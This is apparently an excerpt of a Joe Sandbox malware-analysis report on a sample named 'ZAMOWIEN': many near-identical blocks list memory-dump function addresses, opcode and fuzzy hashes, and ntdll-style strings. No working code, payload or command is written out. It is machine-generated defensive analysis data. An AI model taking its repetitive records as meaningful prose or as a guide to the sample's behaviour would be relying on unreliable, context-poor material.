Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 0c375095270d0e9f4e2d5c3593db0b365cf8ec3a8e5fc7f27b2bf6f91930c558
Instruction ID: fefcb02a4f60745f19a30268dd8caca082729cbd9b40d275ce6dd45ee1c6ef8a
Opcode Fuzzy Hash: 0c375095270d0e9f4e2d5c3593db0b365cf8ec3a8e5fc7f27b2bf6f91930c558
Instruction Fuzzy Hash: 5F31AE39205B06FFE7558B24CD80B89F7A6FF48394F505025E9145BB50DBB5E821CBE0

Function 32871ACB Relevance: 2.8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

AddD, xrefs: 32871C4D
@, xrefs: 32871BF7

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: @$AddD
API String ID: 0-2525844869
Opcode ID: 282c9ef0fe654bb47adb283095b79245c0574da20b0dad40476b21ecb565ca09
Instruction ID: 1b18e72ebf3c5143c09e887dd77777fc5ef9bfb7cccc484df8f8fb952e985082
Opcode Fuzzy Hash: 282c9ef0fe654bb47adb283095b79245c0574da20b0dad40476b21ecb565ca09
Instruction Fuzzy Hash: BDA16DBA514344AFE315CB58C845BABB7EDFF84B04F504A2EF99487150E7B0E948CB62

Function 3280F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 3280F860
$, xrefs: 3280F7F6

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: 179599105356db07e8644f5002d6c55718d41028aaf7dd33bbaa13727261d0dd
Instruction ID: e27df047f2622db6613486e0e5afe85e74f6deea4b1855d5b4f033f3978b2fcd
Opcode Fuzzy Hash: 179599105356db07e8644f5002d6c55718d41028aaf7dd33bbaa13727261d0dd
Instruction Fuzzy Hash: B8618D79A05749EFEB20CFA8C980B99B7B1FF44708F10C469D5196B680CFB4A985CF94

Function 328835BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 328835EC
LdrResGetRCConfig Exit, xrefs: 328835FE

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 9e42df945b9d5aebdb5f05deea575c6ce19ebe5ab67b7fc2df45848fedeb125d
Instruction ID: 75447d6bc238347a641bf257a84a9b3e50322d19d36ae585548763de7ac8febd
Opcode Fuzzy Hash: 9e42df945b9d5aebdb5f05deea575c6ce19ebe5ab67b7fc2df45848fedeb125d
Instruction Fuzzy Hash: 9B31BA792097819FD301CB2DD884B1AB7E4EF84758F040869FCA8CB392EB74D905CB92

Function 3282329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

.Local\, xrefs: 328232B5
@, xrefs: 3282330D

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 2cefb61d944b894599b357a8ea3f47a8bff76fdc08b1c1d2b854cdf935ba0ffc
Instruction ID: 54bb9352528c1015705ec49c8d90e391b0a8903b83064c434b0265d21eb310ee
Opcode Fuzzy Hash: 2cefb61d944b894599b357a8ea3f47a8bff76fdc08b1c1d2b854cdf935ba0ffc
Instruction Fuzzy Hash: 5E31A4BA509704AFE311CF28D994A5BBBE8FBC4754F44092EF99483250DA34DE44CB92

Function 328234B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 32862A90
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 32862A95

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 9b2bd0ac353b736ae09aa95d3f31bf426f788c9b26abe552d2d661bbddebcdff
Instruction ID: 8ffc74ddef4c6a62f2a5c5c33cee0ed085bf366179fc1c982b960a27bfffb2fd
Opcode Fuzzy Hash: 9b2bd0ac353b736ae09aa95d3f31bf426f788c9b26abe552d2d661bbddebcdff
Instruction Fuzzy Hash: FC112C7AB00314BFF7158A4C9D41F6B77A99BA4B58F14C0A97A04EF284DAB9CD4086A0

Function 328C31E1 Relevance: 1.8, APIs: 1, Instructions: 281COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 328C3356

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: CallFilterFunc@8
String ID:
API String ID: 4062629308-0
Opcode ID: 0e56ce69715b6f40e54c6584dfce27db8b0295e5baecfc7f5742173ab8645abe
Instruction ID: 5c0855af07daba299ccabdab19776bedd96fc538d38e73bed2c1beb64d90faca
Opcode Fuzzy Hash: 0e56ce69715b6f40e54c6584dfce27db8b0295e5baecfc7f5742173ab8645abe
Instruction Fuzzy Hash: 7DC113B99017698FDB24CF1AC884699FBF1FF88314F5081AED54DA7254DB34AA82CF40

Function 327F1131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 327F1233

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: a67c980c1fd9b114ca02743689e59d264d7ad9243760f6bb70abaf6467bec949
Instruction ID: ff80a4631e0736fe3d3be5318b8c4411235fd416e2b2a61969afd326a29784bd
Opcode Fuzzy Hash: a67c980c1fd9b114ca02743689e59d264d7ad9243760f6bb70abaf6467bec949
Instruction Fuzzy Hash: E0B112B96093409FD354CF28C480A6ABBE1BF88708F54896EE899DB351DB71E945CB42

Function 327F7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbcb03ac0e87ae307fa8e7b6a7e909236ebdac2031a3e79f2444cb2e372af919
Instruction ID: fce9b586ab91b4dc74647d52ea1198fe1ee7c87b17a734f66d8d956daa8e98fb
Opcode Fuzzy Hash: fbcb03ac0e87ae307fa8e7b6a7e909236ebdac2031a3e79f2444cb2e372af919
Instruction Fuzzy Hash: D1A19D75A08341EFD314CF28C480A5ABBE6FF88744F20492DE9949B350EB71E945CF92

Function 327F7703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f2214b6919dded2a1e18cabeee7bbccf9b2de5f0d5d5cfcfcccb8677ceb47d4
Instruction ID: 81ea602cfc1c2cdf7badbfa427fb59a026e3afdd1effc9356f19e7e2e4f5961c
Opcode Fuzzy Hash: 3f2214b6919dded2a1e18cabeee7bbccf9b2de5f0d5d5cfcfcccb8677ceb47d4
Instruction Fuzzy Hash: B7614179A05606EFDB48CF68C480BADFBB6BF48340F14816AD419AB340DB75A941CB90

Function 3282F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a223e601c550a4fe2c637721de7ef9b1dd0610db90d18ed9ca9efc29a9bf97d8
Instruction ID: 6626f04625ddb108aae027c20314104b3ae9368e960c83e4390c47f7041c6244
Opcode Fuzzy Hash: a223e601c550a4fe2c637721de7ef9b1dd0610db90d18ed9ca9efc29a9bf97d8
Instruction Fuzzy Hash: C44139B8901298EEDB11CFA9C480AAEBBF4FF48344F50856ED459A7251DB319945CF60

Function 328A1AA3 Relevance: 1.6, Strings: 1, Instructions: 370COMMON

Download Yara Rule

Strings

., xrefs: 328A1C01

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 8ef28737fc77709af5a75bb97469b27ccb10b1ca6b0beb67e1a1cadc2b6033e3
Instruction ID: a8200a83f07fe65dbc4dba25f8a8bccf901a7cf101ada7ecffa4fb6432870397
Opcode Fuzzy Hash: 8ef28737fc77709af5a75bb97469b27ccb10b1ca6b0beb67e1a1cadc2b6033e3
Instruction Fuzzy Hash: E0E19F78D002689FDB14CF99C8907ADB7F1FF44B44F94811AE889AB290DF74AC92DB50

Function 327EB480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 327EB50C

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: d1e00ed60331ff839d9ef7c254e441076fcce264221f5f0c0faa1507a7b53e82
Instruction ID: ab47c5a7a3d3add4d51525aeeed14e3daf21309d017468bbc7a2cca7b3b15f8a
Opcode Fuzzy Hash: d1e00ed60331ff839d9ef7c254e441076fcce264221f5f0c0faa1507a7b53e82
Instruction Fuzzy Hash: 35314476102714AFC311CF18C884A5A7BA6FF85364F108669EC569F2A1DB71EC42CFE0

Function 327F57C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 327F5842

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 7f4139ea13a8e1adb6096ce94e59328026d4bab4e36ae5615c1b39cb88c297c6
Instruction ID: 6a0aac5f160649c68863f2aa7352e25e90fb22900855cdc523e420b5476da099
Opcode Fuzzy Hash: 7f4139ea13a8e1adb6096ce94e59328026d4bab4e36ae5615c1b39cb88c297c6
Instruction Fuzzy Hash: EF318E39619A06FFE7468B24CE40E89BBA6FF48350F545025EC109BB50DB75E831CB80

Function 327F3616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 327F36A1

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 5aacc3259133c77347aa4a3095116d285cb9cc3eab21530ed3f057f5442b859d
Instruction ID: 8b70de49c19270df5dc8134d10e56711862ef9cd77684cce089b2937a2218d0f
Opcode Fuzzy Hash: 5aacc3259133c77347aa4a3095116d285cb9cc3eab21530ed3f057f5442b859d
Instruction Fuzzy Hash: 48210679109690FFE7119F18CD84B1ABBA2FF81714F414569E8415F750CBB2E884CF92

Function 327E92FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 327E9325

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 5bcee858466f5fac3d68b04226d3ed2443b806feff816595cfe4dd659cee3156
Instruction ID: 9e97d44f45c232a12d69ad41872e49572a6da57174059221d0f0d46c642b0258
Opcode Fuzzy Hash: 5bcee858466f5fac3d68b04226d3ed2443b806feff816595cfe4dd659cee3156
Instruction Fuzzy Hash: 9AF0FA36200740BBE3319B09CC08F8ABBEEEF84B00F08051DA98293090CAA0A949CA60

Function 327F973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 327F97F3

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction ID: 15400f85b4caa500bb7e891db3819bb2f41f97be38a985784082829307beb7d9
Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction Fuzzy Hash: F9614779D05359EBEB118FA9C840BDEBBB4FF84754F204129E914BB294DB759A00CBA0

Function 3287F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 3287F867

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: e1b133ce3a9bc657271abda2816fb6fcc44130cf0fc963d79ea5018c14d04f5a
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: 9751D0BA505305BFE7128F19C840F5BB7E8FF94755F400929BAA497290DBB4ED04CB92

Function 328AB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 328AB28F

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: a236459823e1939fb1f54f294ffdc7ec29bac7a7dd496d25e6d982b35a6d5273
Instruction ID: 719bd72124b213f0dc51fd1f17975b7df02e251d3330401a18bb5c4f4dbb9767
Opcode Fuzzy Hash: a236459823e1939fb1f54f294ffdc7ec29bac7a7dd496d25e6d982b35a6d5273
Instruction Fuzzy Hash: CF41FFBE910619ABDB02CA98C860BEEB7F9FF54754F050166E915AB250DE74DE00CBA0

Function 328797A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 32879870

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 8772632d49ab5f4f1a79875d3589bbe2ffbbb74a93dac910cdbbf0477673d7f3
Instruction ID: 9fb768705bd4508040397ed55217752b1f2efa28e68607ec69645fed36643f3a
Opcode Fuzzy Hash: 8772632d49ab5f4f1a79875d3589bbe2ffbbb74a93dac910cdbbf0477673d7f3
Instruction Fuzzy Hash: 5F31B0BDB11301AFE7148F2CD860B2677E5EF49754F90847AE948DF380EA758C828B90

Function 32827505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 32864622

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: 1d25daba069ddf019bff169727e5e1b704825022673a463169f1ad911e968e92
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: 7B419FBDA0071AAFEB25CF49C990BBEB7B9EF44745F00405AE94597240DB34D981CBA1

Function 327F5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 327F50BF

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 46dfe2de97ae68c364894741d587f990fc720d18dae8d88cdc18c6b57c1d81d4
Instruction ID: fc8f76ff90bb09e160250546f9728bbd7353ef48f8b2f6bf168f438ec0f79da8
Opcode Fuzzy Hash: 46dfe2de97ae68c364894741d587f990fc720d18dae8d88cdc18c6b57c1d81d4
Instruction Fuzzy Hash: 5A117F7430C706ABF7184929C8507167396FB953E8F30852AE851DFB90DE73E841C381

Function 3287106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 328710F7

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 0ea16c3e5d3c0bdcc6c7250586f26683cb308d55ff97a199f63b49516c7f3f95
Instruction ID: a86c6548a8029beccbfe85b057878d0ab8092ea285c99f0ffc934e8c31f6a07e
Opcode Fuzzy Hash: 0ea16c3e5d3c0bdcc6c7250586f26683cb308d55ff97a199f63b49516c7f3f95
Instruction Fuzzy Hash: 612132B55183449FC310CF2AC845A5BFBE8BFD5B00F400A1EB9A49B650DBB1D805CBA2

Function 3284739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 832afab0d4ff74fdeab34d7190da593c55a4942595d7333a64dc26a7d5a57a3a
Instruction ID: c6b0a2a88ee503e6f1c485e6dca8fac86896f1d0d5c592a4e5d9eb37fa23c6a9
Opcode Fuzzy Hash: 832afab0d4ff74fdeab34d7190da593c55a4942595d7333a64dc26a7d5a57a3a
Instruction Fuzzy Hash: E142A279A0061A9FDB08CF59C890AAEB7B2FF88354F54856DD955AB340DF34EC42CB90

Function 3281B2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ffca889a768c97b54056e69e14a839d99f0adf60aa068dabc2beb7ca1942ede
Instruction ID: fbafe686473aea1d6b7d83c74fe4cecb6655ac5c2177182168796d29fa15afce
Opcode Fuzzy Hash: 5ffca889a768c97b54056e69e14a839d99f0adf60aa068dabc2beb7ca1942ede
